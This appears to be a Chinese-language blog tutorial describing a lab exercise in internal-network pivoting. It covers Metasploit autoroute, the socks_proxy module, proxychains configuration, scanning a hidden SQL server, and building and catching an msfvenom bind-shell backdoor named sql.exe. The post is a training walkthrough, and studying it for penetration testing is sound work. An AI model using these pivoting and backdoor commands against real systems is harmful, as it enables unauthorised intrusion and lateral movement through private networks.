前言
欢迎来到我的博客
个人主页:北岭敲键盘的荒漠猫-优快云博客
本文整理在linux系统下,利用msf配合代理转发工具proxychains实现访问不出网主机
实验环境与构架
本次实验目的利用代理通讯链让kali攻击服务器能直接访问管理员win7系统。
实现原理:
利用一个主机多个网卡的特性,即沦陷一台主机就能利用这台主机访问本不应在外网可访问到的主机,这个就是我们访问内网不可达主机的原理。
实验开始
初期外网渗透结束位置
内网主机群体防火墙关闭
我们跳过外网web渗透直接从上线web服务器开始操作。
现在这个小内网我们当前攻击进度如下:
接下来我们的目的就是能够让我们kali中的工具能直接访问sql服务器,进行下面部分的攻击。
配置代理通讯sql服务器
现在我们知道了我们拥有了web服务器的权限。
现在我们就需要查看这个服务器的路由,看看web服务器有哪几个网卡。
能够访问哪几个网段。
run autoroute -p第一次使用未开启模块需要输入下面这个run post/multi/manage/autoroute
现在我们得知,当前文件有128和152两个网段的网卡。
再执行一遍,可查看
run autoroute -p
现在需要我们在对方主机上开启socket协议
用来转发流量,或者去正向上线木马。
首先我们要暂时退出控制session的命令行。
然后使用auxiliary/server/socks_proxy模块
background
use auxiliary/server/socks_proxy
使用模块后可以用
show options
来查看可配置的选项
我们可以选择使用socket5或者4a版本,以及开放协议的端口号。
如果是5的话可以配置账号密码。
这里随便设置一个8848端口。
然后run即可。
现在就会在web机器上开启socket协议。
现在我们要配置proxychains
(kali中自带了这个东西,但是如果是其他的linux的服务器,需要自己下载)
他有一个配置文件(操作有点像改hosts文件)
在etc目录下有这个文件
打开后最底下
像添加hosts规则一样把协议,ip跟端口写在这里。
我的环境中我们需要添加的是
socks5 127.0.0.1 8848
然后我们使用代理的命令只要前面加一个proxychains4即可。
现在我们直接尝试nmap扫描sql服务器192.168.152.131即可
这里直接nmap无法扫描,原因是nmap会用到一些ping等协议,这些底层的socket做不了,所以出问题。
现在我们就能通讯sql服务器了。
正向拿下sql服务器权限
现在假设我们拿下sql权限。
生成正向后门。
msfvenom -p windows/meterpreter/bind_tcp LPORT=8849 -f exe -o sql.exe
正向后门是我们找对方,所以需要先运行木马,在进行监听
现在对方点击了木马
设置监听
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost [目标ip]
set lport [己方端口]
run
返回界面之后可以用
sessions和jobs分别查看session和代理的设置
之后感染内网的其他计算机就是上面的相同规则。